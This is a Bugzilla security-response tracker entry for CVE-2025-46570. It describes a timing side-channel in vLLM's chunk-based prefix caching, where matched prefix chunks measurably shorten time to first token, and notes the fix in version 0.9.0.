Bug 2369223 (CVE-2025-46570) - CVE-2025-46570 vllm: vLLM’s Chunk-Based Prefix Caching Vulnerable to Potential Timing Side-Channel
Summary: CVE-2025-46570 vllm: vLLM’s Chunk-Based Prefix Caching Vulnerable to Potentia...
Keywords:
Status: NEW
Alias: CVE-2025-46570
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
low
low
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2025-05-29 17:01 UTC by OSIDB Bzimport
Modified: 2025-05-30 13:39 UTC (History)
5 users (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2025-05-29 17:01:15 UTC
vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.


Note You need to log in before you can comment on or make changes to this bug.